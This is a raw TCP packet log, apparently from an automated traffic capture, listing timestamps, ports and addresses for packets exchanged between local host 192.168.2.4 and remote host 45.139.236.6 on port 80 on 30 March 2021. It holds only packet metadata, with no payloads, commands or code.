Mar 30, 2021 14:22:48.662180901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662203074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662213087 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662225008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662246943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662269115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662285089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662291050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662302971 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662319899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662344933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662350893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662367105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662388086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662405014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662410021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662431002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662445068 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662451982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662476063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662487984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662502050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662525892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662534952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662549019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662571907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662584066 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662594080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662616968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662632942 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662638903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662661076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662679911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662688017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662713051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662719011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662734985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662755966 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662779093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662785053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662802935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662812948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662843943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662866116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662878036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662893057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662916899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662938118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662950039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.662960052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662982941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662995100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663005114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663007975 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663028955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663050890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663069010 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663078070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663100958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663116932 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663121939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663144112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663162947 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663167000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663192034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663204908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663213968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663235903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663247108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663261890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663284063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663295984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663305044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663326025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663340092 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663347960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663369894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663384914 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663392067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663414001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663423061 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663444042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663467884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663475990 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663490057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663511038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663518906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663533926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663553953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663574934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663587093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663595915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663621902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663635969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663646936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663646936 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663670063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663691044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663696051 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663713932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663734913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663753986 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663755894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663775921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663778067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663805008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663829088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663841009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663851976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663872957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663877964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663894892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663914919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663921118 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663935900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663960934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.663966894 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.663988113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664011002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664020061 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664031982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664052963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664067984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664073944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664108992 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664113045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664139986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664160967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664166927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664200068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664230108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664231062 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664256096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664278984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664282084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664310932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664336920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664340019 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664364100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664388895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664391994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664424896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664438963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664454937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664477110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664498091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664518118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664545059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664554119 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664572954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664582968 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664602995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664606094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664637089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664661884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.664661884 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.664721966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.667789936 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.747785091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.747854948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.747893095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.747944117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.747987986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748025894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748064041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748083115 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748115063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748153925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748188019 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748193026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748233080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748281956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748323917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748332024 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748362064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748400927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748436928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748440027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748493910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748511076 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748550892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748605013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748641014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748653889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748697042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748737097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748739004 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748776913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748807907 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748815060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748852968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748891115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748898029 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.748929977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748977900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.748980045 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749022007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749044895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749059916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749099970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749136925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749177933 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749185085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749228001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749265909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749279022 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749305964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749344110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749345064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749413013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749422073 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749465942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749505997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749543905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749578953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749588013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749592066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749635935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749670982 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749675035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749713898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749754906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749790907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749804974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749830961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749869108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749890089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749916077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749958038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.749973059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.749998093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.750035048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.750099897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.750904083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.750950098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.750988960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751029015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751049995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751068115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751107931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751157999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751159906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751199961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751225948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751240969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751280069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751298904 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751321077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751370907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751393080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751416922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751456022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751496077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751509905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751535892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751578093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751580954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751636028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751642942 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751687050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751738071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751741886 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751780987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751820087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751832962 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751859903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751895905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751899958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751939058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.751971006 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.751980066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752018929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752068043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752106905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752110958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752151012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752190113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752202034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752228975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752265930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752266884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752309084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752324104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752348900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752396107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752413034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752439022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752476931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752504110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752516031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752556086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752593994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752598047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752630949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752669096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752703905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752716064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752760887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752799034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752839088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752845049 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752880096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752918959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752955914 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.752957106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.752996922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753046036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753060102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753078938 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753089905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753128052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753161907 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753165960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753206968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753243923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753248930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753285885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753324032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753338099 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753372908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753382921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.753447056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.753458023 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.759907007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.836510897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836559057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836601019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836638927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836687088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836730957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836750984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.836775064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836816072 CEST	80	49744	45.139.236.6	192.168.2.4
